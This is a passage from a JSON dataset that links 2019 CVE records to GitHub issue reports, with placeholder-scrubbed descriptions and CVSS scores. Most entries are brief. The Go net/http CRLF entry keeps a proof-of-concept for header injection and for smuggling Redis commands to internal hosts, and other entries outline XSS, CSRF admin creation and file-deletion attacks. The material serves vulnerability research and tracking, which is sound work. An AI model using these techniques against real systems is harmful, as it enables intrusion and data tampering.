  45282. "CVE_ID": "CVE-2019-9634",
  45283. "Issue_Url_old": "https://github.com/golang/go/issues/30642",
  45284. "Issue_Url_new": "https://github.com/golang/go/issues/30642",
  45285. "Repo_new": "golang/go",
  45286. "Issue_Created_At": "2019-03-06T21:00:30Z",
  45287. "description": "runtime: dll injection vulnerabilities on Windows. MENTIONTAG suggested I open an issue for this rather than merely pushing fixes up to gerrit, so that we can track this for a NUMBERTAG point release. This runtime PR cleans up some APITAG usage: URLTAG And this x/sys PR makes the fallback there more reliable: URLTAG The goal is that everywhere APITAG preferred, but when not possible, APITAG is called only with either an absolute path computed properly with APITAG or with the exact string APITAG . I haven't yet dynamically traced the exes yet to verify I've whacked them all now, but hopefully I or someone else can get that done before this issue is closed.",
  45288. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45289. "severity": "HIGH",
  45290. "baseScore": 7.8,
  45291. "impactScore": 5.9,
  45292. "exploitabilityScore": 1.8
  45293. },
  45294. {
  45295. "CVE_ID": "CVE-2019-9656",
  45296. "Issue_Url_old": "https://github.com/libofx/libofx/issues/22",
  45297. "Issue_Url_new": "https://github.com/libofx/libofx/issues/22",
  45298. "Repo_new": "libofx/libofx",
  45299. "Issue_Created_At": "2019-03-06T06:59:42Z",
  45300. "description": "A null pointer dereference problem in function APITAG const&) in file APITAG The report and the PoC to reproduce the bug can be found here: URLTAG .",
  45301. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45302. "severity": "HIGH",
  45303. "baseScore": 8.8,
  45304. "impactScore": 5.9,
  45305. "exploitabilityScore": 2.8
  45306. },
  45307. {
  45308. "CVE_ID": "CVE-2019-9658",
  45309. "Issue_Url_old": "https://github.com/checkstyle/checkstyle/issues/6478",
  45310. "Issue_Url_new": "https://github.com/checkstyle/checkstyle/issues/6478",
  45311. "Repo_new": "checkstyle/checkstyle",
  45312. "Issue_Created_At": "2019-02-25T03:28:30Z",
  45313. "description": "Remove DTDs from FILETAG; the location on FILETAG is not secure. All checkstyle versions below NUMBERTAG are not very secure; see details",
  45314. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  45315. "severity": "MEDIUM",
  45316. "baseScore": 5.3,
  45317. "impactScore": 1.4,
  45318. "exploitabilityScore": 3.9
  45319. },
  45320. {
  45321. "CVE_ID": "CVE-2019-9658",
  45322. "Issue_Url_old": "https://github.com/checkstyle/checkstyle/issues/6474",
  45323. "Issue_Url_new": "https://github.com/checkstyle/checkstyle/issues/6474",
  45324. "Repo_new": "checkstyle/checkstyle",
  45325. "Issue_Created_At": "2019-02-24T15:42:58Z",
  45326. "description": "Disable loading external DTDs by default, and create a system property to activate it. The ability to load external DTDs is considered a security issue, especially if the DTDs are not hosted over HTTPS. Checkstyle previously used to rely on remote DTD files, so this ability was enabled by default. Old",
  45327. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  45328. "severity": "MEDIUM",
  45329. "baseScore": 5.3,
  45330. "impactScore": 1.4,
  45331. "exploitabilityScore": 3.9
  45332. },
  45333. {
  45334. "CVE_ID": "CVE-2019-9660",
  45335. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/12",
  45336. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/12",
  45337. "Repo_new": "yzmcms/yzmcms",
  45338. "Issue_Created_At": "2019-03-09T01:29:50Z",
  45339. "description": "There is a stored XSS vulnerability in yzmcms NUMBERTAG ulnerability description A xss vulnerability was discovered in yzmcms. In APITAG NUMBERTAG stored XSS exists via the PATHTAG catname parameter, which allows remote attackers to inject arbitrary web script or HTML. poc xss payload: ERRORTAG FILETAG FILETAG FILETAG",
  45340. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45341. "severity": "MEDIUM",
  45342. "baseScore": 4.8,
  45343. "impactScore": 2.7,
  45344. "exploitabilityScore": 1.7
  45345. },
  45346. {
  45347. "CVE_ID": "CVE-2019-9661",
  45348. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/13",
  45349. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/13",
  45350. "Repo_new": "yzmcms/yzmcms",
  45351. "Issue_Created_At": "2019-03-09T01:37:00Z",
  45352. "description": "There is a stored XSS vulnerability in yzmcms NUMBERTAG ulnerability description A xss vulnerability was discovered in yzmcms. In APITAG NUMBERTAG stored XSS exists via the PATHTAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc xss payload: APITAG FILETAG FILETAG FILETAG",
  45353. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45354. "severity": "MEDIUM",
  45355. "baseScore": 4.8,
  45356. "impactScore": 2.7,
  45357. "exploitabilityScore": 1.7
  45358. },
  45359. {
  45360. "CVE_ID": "CVE-2019-9662",
  45361. "Issue_Url_old": "https://github.com/jetiben/jtbc/issues/9",
  45362. "Issue_Url_new": "https://github.com/jetiben/jtbc/issues/9",
  45363. "Repo_new": "jetiben/jtbc",
  45364. "Issue_Created_At": "2019-03-10T12:32:11Z",
  45365. "description": "There is a vulnerability that can delete unexpected critical files. Vulnerability description An issue was discovered in JTBC(PHP NUMBERTAG Its cache management module is flawed. Arbitrary files ending in APITAG can be deleted via a PATHTAG FILETAG Change the param to the filename that we want to delete: FILETAG FILETAG FILETAG FILETAG Result: FILETAG JTBC(PHP) has many important files ending with \". APITAG so this issue can damage the whole website: FILETAG FILETAG",
  45366. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  45367. "severity": "HIGH",
  45368. "baseScore": 7.5,
  45369. "impactScore": 3.6,
  45370. "exploitabilityScore": 3.9
  45371. },
  45372. {
  45373. "CVE_ID": "CVE-2019-9688",
  45374. "Issue_Url_old": "https://github.com/forgeekscn/sftnow/issues/6",
  45375. "Issue_Url_new": "https://github.com/forgeekscn/sftnow/issues/6",
  45376. "Repo_new": "forgeekscn/sftnow",
  45377. "Issue_Created_At": "2019-03-09T15:11:48Z",
  45378. "description": "CSRF Vulnerability to add an admin account. The POC is the following code which, when opened by a logged-in admin, will generate a superuser account called \"naive\" whose password is also \"naive\". APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG",
  45379. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45380. "severity": "HIGH",
  45381. "baseScore": 8.8,
  45382. "impactScore": 5.9,
  45383. "exploitabilityScore": 2.8
  45384. },
  45385. {
  45386. "CVE_ID": "CVE-2019-9710",
  45387. "Issue_Url_old": "https://github.com/marshmallow-code/webargs/issues/371",
  45388. "Issue_Url_new": "https://github.com/marshmallow-code/webargs/issues/371",
  45389. "Repo_new": "marshmallow-code/webargs",
  45390. "Issue_Created_At": "2019-03-11T10:57:46Z",
  45391. "description": "Race conditions for parallel requests. I just noticed that something in webargs or marshmallow isn't thread safe. Take this minimal example\" CODETAG Run it with threading enabled: $ FLASK_APP=webargsrace.py flask run p NUMBERTAG with threads Now send two requests in parallel, with different values: $ http post URLTAG 'value=foo' & ; http post URLTAG 'value=bar' & The output from these two requests is: APITAG APITAG Clearly not what one would have expected! :bomb: The output of the print statement showing the request data and what the field receives confirms the issue: APITAG",
  45392. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45393. "severity": "HIGH",
  45394. "baseScore": 8.1,
  45395. "impactScore": 5.9,
  45396. "exploitabilityScore": 2.2
  45397. },
  45398. {
  45399. "CVE_ID": "CVE-2019-9736",
  45400. "Issue_Url_old": "https://github.com/cnxh/1024tools/issues/20",
  45401. "Issue_Url_new": "https://github.com/cnxh/1024tools/issues/20",
  45402. "Repo_new": "cnxh/1024tools",
  45403. "Issue_Created_At": "2019-03-07T04:47:52Z",
  45404. "description": "XSS vulnerability in the APITAG tag; SVG includes an attack vector. This tag and attack vector will cause DOM-based XSS. If you type APITAG APITAG \uff0cthe XSS vulnerability will be triggered. FILETAG",
  45405. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45406. "severity": "MEDIUM",
  45407. "baseScore": 6.1,
  45408. "impactScore": 2.7,
  45409. "exploitabilityScore": 2.8
  45410. },
  45411. {
  45412. "CVE_ID": "CVE-2019-9737",
  45413. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/662",
  45414. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/662",
  45415. "Repo_new": "pandao/editor.md",
  45416. "Issue_Created_At": "2019-03-07T03:35:34Z",
  45417. "description": "XSS vulnerability in the APITAG tag; SVG includes an attack vector. This tag and attack vector will cause DOM-based XSS. If you type CODETAG \uff0cthe XSS vulnerability will be triggered. FILETAG",
  45418. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45419. "severity": "MEDIUM",
  45420. "baseScore": 6.1,
  45421. "impactScore": 2.7,
  45422. "exploitabilityScore": 2.8
  45423. },
  45424. {
  45425. "CVE_ID": "CVE-2019-9738",
  45426. "Issue_Url_old": "https://github.com/jimmykuu/gopher/issues/88",
  45427. "Issue_Url_new": "https://github.com/jimmykuu/gopher/issues/88",
  45428. "Repo_new": "jimmykuu/gopher",
  45429. "Issue_Created_At": "2019-03-12T07:54:03Z",
  45430. "description": "XSS vulnerability in the APITAG tag; SVG includes an attack vector. This tag and attack vector will cause DOM-based XSS. If you type APITAG APITAG \uff0cthe XSS vulnerability will be triggered. FILETAG",
  45431. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45432. "severity": "MEDIUM",
  45433. "baseScore": 6.1,
  45434. "impactScore": 2.7,
  45435. "exploitabilityScore": 2.8
  45436. },
  45437. {
  45438. "CVE_ID": "CVE-2019-9741",
  45439. "Issue_Url_old": "https://github.com/golang/go/issues/30794",
  45440. "Issue_Url_new": "https://github.com/golang/go/issues/30794",
  45441. "Repo_new": "golang/go",
  45442. "Issue_Created_At": "2019-03-13T02:40:30Z",
  45443. "description": "net/http CRLF injection vulnerability. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG linux/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env GOARCH=\"amd NUMBERTAG GOBIN=\"\" PATHTAG GOEXE=\"\" GOFLAGS=\"\" GOHOSTARCH=\"amd NUMBERTAG GOHOSTOS=\"linux\" GOOS=\"linux\" PATHTAG GOPROXY=\"\" GORACE=\"\" PATHTAG GOTMPDIR=\"\" PATHTAG GCCGO=\"gccgo\" CC=\"gcc\" CXX=\"g++\" CGO_ENABLED NUMBERTAG GOMOD=\"\" CGO_CFLAGS=\" g O2\" CGO_CPPFLAGS=\"\" CGO_CXXFLAGS=\" g O2\" CGO_FFLAGS=\" g O2\" CGO_LDFLAGS=\" g O2\" PKG_CONFIG=\"pkg config\" GOGCCFLAGS=\" fPIC m NUMBERTAG pthread fmessage length NUMBERTAG PATHTAG gno record gcc switches\" APITAG APITAG Principles The current implementation of APITAG does not encode the \u2018 \u2019 sequence in the query string, which allowed the attacker to manipulate a HTTP header with the \u2018 \u2019 sequence in it, so the attacker could insert arbitrary content to the new line of the HTTP header. What did you do? APITAG Consider the following Golong code snippet: package main import ( \"fmt\" \"net/http\" ) func APITAG { client := APITAG host := APITAG HTTP NUMBERTAG injected: header TEST NUMBERTAG url := \"http://\" + host + PATHTAG request, err := APITAG url, nil) if err != nil { APITAG error \") } resp, err := APITAG if err != nil { APITAG error \") } APITAG } In this script, the host parameter usually could be controlled by user, and the content of host above is exactly the payload. We setup a server using nc to open a NUMBERTAG port and to receive and display the HTTP request data from client , then run the code above on a client to sent a HTTP request to the server. 
nc l p NUMBERTAG GET /?a NUMBERTAG HTTP NUMBERTAG injected: header TEST: PATHTAG HTTP NUMBERTAG Host NUMBERTAG APITAG User Agent: Go http client NUMBERTAG Accept Encoding: gzip As you can see in the picture above, the nc server displayed the HTTP request with a manipulated header content:\u201d X injected:header\u201d, which means we successfully injected the HTTP header. In order to make the injected header usable, we have to add an extra CRLF after the new header, so we add another parameter to contain the original parameter data, like \u2018TEST\u2019 in the sample above. Attack Scenarios NUMBERTAG By crafting HTTP headers, it\u2019s possible to fool some web services NUMBERTAG It\u2019s also possible to attack several simple services like Redis and memcached. Let\u2019s take Redis as an example here: Adapt the script above to this: package main import ( \"fmt\" \"net/http\" ) func APITAG { client := APITAG host := APITAG SET test success \" url := \"http://\" + host + PATHTAG request, err := APITAG url, nil) if err != nil { APITAG error \") } resp, err := APITAG if err != nil { APITAG error \") } APITAG } We changed the injected header to a valid redis command; after executing this, we check the redis server: APITAG GET test \"success\" APITAG We can see that a \u201ctest\u201d key was inserted successfully. Conclusion The implementation of parameter handling of APITAG is vulnerable, which allows an attacker to manipulate the HTTP header. An attacker who is able to control the request address parameter of this library could exploit this vulnerability to manipulate an HTTP header and attack an internal host such as a normal web server, Memcached, Redis and so on.",
  45444. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45445. "severity": "MEDIUM",
  45446. "baseScore": 6.1,
  45447. "impactScore": 2.7,
  45448. "exploitabilityScore": 2.8
  45449. },
  45450. {
  45451. "CVE_ID": "CVE-2019-9749",
  45452. "Issue_Url_old": "https://github.com/fluent/fluent-bit/issues/1135",
  45453. "Issue_Url_new": "https://github.com/fluent/fluent-bit/issues/1135",
  45454. "Repo_new": "fluent/fluent-bit",
  45455. "Issue_Created_At": "2019-02-25T16:27:34Z",
  45456. "description": "Memory corruption while processing MQTT input plugin leading to crash of the server. Fluent Bit MQTT input plugin acting as MQTT broker (server) incorrectly handles incoming network messages. After processing crafted packet plugin executes APITAG function with negative size param. That leads to crash of the whole Fluent Bit server via SIGSEGV signal. Proposed CVSS NUMBERTAG score NUMBERTAG APITAG PATHTAG Error message WITHOUT Address Sanitizer: PATHTAG i mqtt t data o stdout m ' ' APITAG Fluent Bit NUMBERTAG Copyright (C) Treasure Data FILETAG",
  45457. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  45458. "severity": "HIGH",
  45459. "baseScore": 7.5,
  45460. "impactScore": 3.6,
  45461. "exploitabilityScore": 3.9
  45462. },
  45463. {
  45464. "CVE_ID": "CVE-2019-9764",
  45465. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5519",
  45466. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5519",
  45467. "Repo_new": "hashicorp/consul",
  45468. "Issue_Created_At": "2019-03-20T10:50:50Z",
  45469. "description": "Something isn't right.... When filing a bug, please include the following headings if possible. Any example text in this template can be deleted. Overview of the Issue A paragraph or two about the issue you're experiencing. Reproduction Steps Steps to reproduce this issue, eg NUMBERTAG Create a cluster with n client nodes n and n server nodes NUMBERTAG Run APITAG NUMBERTAG iew error Consul info for both Client and Server APITAG APITAG info APITAG APITAG APITAG APITAG APITAG info APITAG APITAG APITAG Operating system and Environment details OS, Architecture, and any other information you can provide about the environment. Log Fragments Include appropriate Client or Server log fragments. If the log is longer than a few dozen lines, please include the URL to the FILETAG of the log instead of posting it in the issue. Use APITAG on the client and server to capture the maximum log detail.",
  45470. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  45471. "severity": "HIGH",
  45472. "baseScore": 7.4,
  45473. "impactScore": 5.2,
  45474. "exploitabilityScore": 2.2
  45475. },
  45476. {
  45477. "CVE_ID": "CVE-2019-9765",
  45478. "Issue_Url_old": "https://github.com/xpleaf/Blog_mini/issues/43",
  45479. "Issue_Url_new": "https://github.com/xpleaf/blog_mini/issues/43",
  45480. "Repo_new": "xpleaf/blog_mini",
  45481. "Issue_Created_At": "2019-03-14T02:09:05Z",
  45482. "description": "Cross Site Scripting Vulnerability in Latest Release. Hi, I would like to report a Cross Site Scripting vulnerability in the latest release. Description: Cross site scripting (XSS) vulnerability in PATHTAG APITAG function and PATHTAG NUMBERTAG line. Steps To Reproduce NUMBERTAG select one article's details, like: URLTAG NUMBERTAG find the article comment or create a new comment. APITAG the comment, and the nickname is XSS APITAG APITAG alert NUMBERTAG APITAG ,then submit. FILETAG APITAG the reply button to trigger the payload. Using this vulnerability, I can steal admin cookies and more. FILETAG author by jin. EMAILTAG .cn",
  45483. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45484. "severity": "MEDIUM",
  45485. "baseScore": 6.1,
  45486. "impactScore": 2.7,
  45487. "exploitabilityScore": 2.8
  45488. },
  45489. {
  45490. "CVE_ID": "CVE-2019-9768",
  45491. "Issue_Url_old": "https://github.com/thinkst/canarytokens/issues/35",
  45492. "Issue_Url_new": "https://github.com/thinkst/canarytokens/issues/35",
  45493. "Repo_new": "thinkst/canarytokens",
  45494. "Issue_Created_At": "2019-03-13T10:30:05Z",
  45495. "description": "APITAG Detection Bypass (MS WORD). This was reported to EMAILTAG NUMBERTAG days ago. Please confirm and fix these issues, also I'd really like a version number. Reported by Gionathan Armando Reale Identification: Due to PATHTAG being very limited in variation it is easily possible to detect which Word documents are likely to contain APITAG Detection Bypass: Opening a Word document containing a APITAG using Protected View will allow you to view the file without triggering the APITAG Opening the Word document with Libreoffice Writer NUMBERTAG will allow you to view the file without triggering the APITAG Other document viewers may also bypass detection.",
  45496. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  45497. "severity": "HIGH",
  45498. "baseScore": 7.5,
  45499. "impactScore": 3.6,
  45500. "exploitabilityScore": 3.9
  45501. },
  45502. {
  45503. "CVE_ID": "CVE-2019-9770",
  45504. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/99",
  45505. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/99",
  45506. "Repo_new": "libredwg/libredwg",
  45507. "Issue_Created_At": "2019-03-12T10:51:26Z",
  45508. "description": "serveral bugs in APITAG libredwg version libredwg NUMBERTAG and NUMBERTAG description txt libredwg download link URLTAG APITAG NUMBERTAG null pointer dereference description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function dwg_dxf_LEADER at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG bit_read_B MENTIONTAG description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an out of bounds read in function bit_read_B at commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dwg_decode_eed_data at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dwg_dxf_LTYPE at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dxf_header_write at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG dwg_dxf_LTYPE MENTIONTAG description An issue was 
discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function dwg_dxf_LTYPE at commandline dwg2dxf APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG null pointer dereference description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function dwg_dxf_LTYPE at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG EMAILTAG NUMBERTAG null pointer dereference description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an null pointer dereference in function bit_convert_TU at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an heap buffer overflow in function dwg_decode_eed_data at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG APITAG NUMBERTAG out of bounds read description An issue was discovered in libredwg NUMBERTAG and NUMBERTAG There is a/an out of bounds read in function dwg_dxf_BLOCK_CONTROL at APITAG NUMBERTAG commandline dwg2dxf APITAG o /dev/null source c None bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG dwg Auto generated by pyspider at NUMBERTAG FILETAG And a same report send to APITAG CVETAG",
  45509. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  45510. "severity": "HIGH",
  45511. "baseScore": 7.5,
  45512. "impactScore": 3.6,
  45513. "exploitabilityScore": 3.9
  45514. },
  45515. {
  45516. "CVE_ID": "CVE-2019-9785",
  45517. "Issue_Url_old": "https://github.com/zhaopengme/gitnote/issues/209",
  45518. "Issue_Url_new": "https://github.com/zhaopengme/gitnote/issues/209",
  45519. "Repo_new": "zhaopengme/gitnote",
  45520. "Issue_Created_At": "2019-03-14T05:42:14Z",
  45521. "description": "malicious markdown file can cause RCE. Describe the bug A malicious markdown file can cause remote code execution\u3002 To Reproduce Steps to reproduce the behavior NUMBERTAG clone the repository to local place NUMBERTAG open the malicious file Expected behavior if the file contains malicious code, it will be executed\u3002 Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: mac os version NUMBERTAG B NUMBERTAG ersion: version NUMBERTAG B NUMBERTAG",
  45522. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45523. "severity": "HIGH",
  45524. "baseScore": 7.8,
  45525. "impactScore": 5.9,
  45526. "exploitabilityScore": 1.8
  45527. },
  45528. {
  45529. "CVE_ID": "CVE-2019-9834",
  45530. "Issue_Url_old": "https://github.com/netdata/netdata/issues/5800",
  45531. "Issue_Url_new": "https://github.com/netdata/netdata/issues/5800",
  45532. "Repo_new": "netdata/netdata",
  45533. "Issue_Created_At": "2019-04-04T12:24:56Z",
  45534. "description": "CVETAG . We're running your nightly release APITAG rc NUMBERTAG nightly). Has this issue been addressed already? I couldn't find another issue about this cve. CVETAG",
  45535. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45536. "severity": "MEDIUM",
  45537. "baseScore": 6.1,
  45538. "impactScore": 2.7,
  45539. "exploitabilityScore": 2.8
  45540. },
  45541. {
  45542. "CVE_ID": "CVE-2019-9837",
  45543. "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper-openid_connect/issues/61",
  45544. "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper-openid_connect/issues/61",
  45545. "Repo_new": "doorkeeper-gem/doorkeeper-openid_connect",
  45546. "Issue_Created_At": "2019-02-07T01:06:49Z",
  45547. "description": "Open redirect vulnerability when APITAG .",
  45548. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45549. "severity": "MEDIUM",
  45550. "baseScore": 6.1,
  45551. "impactScore": 2.7,
  45552. "exploitabilityScore": 2.8
  45553. },
  45554. {
  45555. "CVE_ID": "CVE-2019-9843",
  45556. "Issue_Url_old": "https://github.com/diffplug/spotless/issues/358",
  45557. "Issue_Url_new": "https://github.com/diffplug/spotless/issues/358",
  45558. "Repo_new": "diffplug/spotless",
  45559. "Issue_Created_At": "2019-02-13T20:52:58Z",
  45560. "description": "The XML parser isn't respecting APITAG as false. Original Comment: URLTAG > CODETAG If we are seeing HTTP get requests inside of the XML parser that means that the parser is vulnerable to XXE URLTAG . We need to fix this so that the spotless XML formatter is not making external entity requests. We can't have our linting infrastructure making web requests. Especially web requests over HTTP as those can be maliciously intercepted by a MITM. Here's an example where this has been a serious problem in the past. URLTAG CC: MENTIONTAG This is a security vulnerability in spotless and should be treated as such.",
  45561. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45562. "severity": "HIGH",
  45563. "baseScore": 7.5,
  45564. "impactScore": 5.9,
  45565. "exploitabilityScore": 1.6
  45566. },
  45567. {
  45568. "CVE_ID": "CVE-2019-9870",
  45569. "Issue_Url_old": "https://github.com/w8tcha/CKEditor-oEmbed-Plugin/issues/94",
  45570. "Issue_Url_new": "https://github.com/w8tcha/ckeditor-oembed-plugin/issues/94",
  45571. "Repo_new": "w8tcha/ckeditor-oembed-plugin",
  45572. "Issue_Created_At": "2019-03-12T15:34:23Z",
  45573. "description": "Issue within the APITAG APITAG Plugin. Hi W8tcha, I discovered an issue within the APITAG plugin but I would not like to disclose it here. Is there a way to come in contact with you via your work email? Kind Regards, Ioannis Adamos",
  45574. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45575. "severity": "CRITICAL",
  45576. "baseScore": 9.8,
  45577. "impactScore": 5.9,
  45578. "exploitabilityScore": 3.9
  45579. },
  45580. {
  45581. "CVE_ID": "CVE-2019-9878",
  45582. "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/46",
  45583. "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/46",
  45584. "Repo_new": "kermitt2/pdfalto",
  45585. "Issue_Created_At": "2019-03-13T07:19:33Z",
  45586. "description": "invalid memory access in APITAG ). Description we observed an invalid memory access in function APITAG ) located in APITAG APITAG same can be triggered by sending a crafted pdf file to the pdfalto binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command : ./pdfalto f NUMBERTAG l NUMBERTAG APITAG APITAG outline annotation APITAG blocks APITAG ocr APITAG $POC POC REPRODUCER URLTAG Debug ERRORTAG",
  45587. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45588. "severity": "HIGH",
  45589. "baseScore": 7.8,
  45590. "impactScore": 5.9,
  45591. "exploitabilityScore": 1.8
  45592. },
  45593. {
  45594. "CVE_ID": "CVE-2019-9893",
  45595. "Issue_Url_old": "https://github.com/seccomp/libseccomp/issues/139",
  45596. "Issue_Url_new": "https://github.com/seccomp/libseccomp/issues/139",
  45597. "Repo_new": "seccomp/libseccomp",
  45598. "Issue_Created_At": "2019-02-18T18:32:14Z",
  45599. "description": "BUG: APITAG . Placeholder for a bug, details TBD.",
  45600. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45601. "severity": "CRITICAL",
  45602. "baseScore": 9.8,
  45603. "impactScore": 5.9,
  45604. "exploitabilityScore": 3.9
  45605. },
  45606. {
  45607. "CVE_ID": "CVE-2019-9900",
  45608. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/6434",
  45609. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/6434",
  45610. "Repo_new": "envoyproxy/envoy",
  45611. "Issue_Created_At": "2019-03-29T17:02:25Z",
  45612. "description": "Reserved issue for pending security disclosure NUMBERTAG TBA",
  45613. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
  45614. "severity": "HIGH",
  45615. "baseScore": 8.3,
  45616. "impactScore": 3.7,
  45617. "exploitabilityScore": 3.9
  45618. },
  45619. {
  45620. "CVE_ID": "CVE-2019-9901",
  45621. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/6435",
  45622. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/6435",
  45623. "Repo_new": "envoyproxy/envoy",
  45624. "Issue_Created_At": "2019-03-29T17:03:07Z",
  45625. "description": "Reserved issue for pending security disclosure NUMBERTAG TBA",
  45626. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  45627. "severity": "CRITICAL",
  45628. "baseScore": 10.0,
  45629. "impactScore": 6.0,
  45630. "exploitabilityScore": 3.9
  45631. },
  45632. {
  45633. "CVE_ID": "CVE-2019-9915",
  45634. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300",
  45635. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1300",
  45636. "Repo_new": "getsimplecms/getsimplecms",
  45637. "Issue_Created_At": "2018-11-12T12:15:27Z",
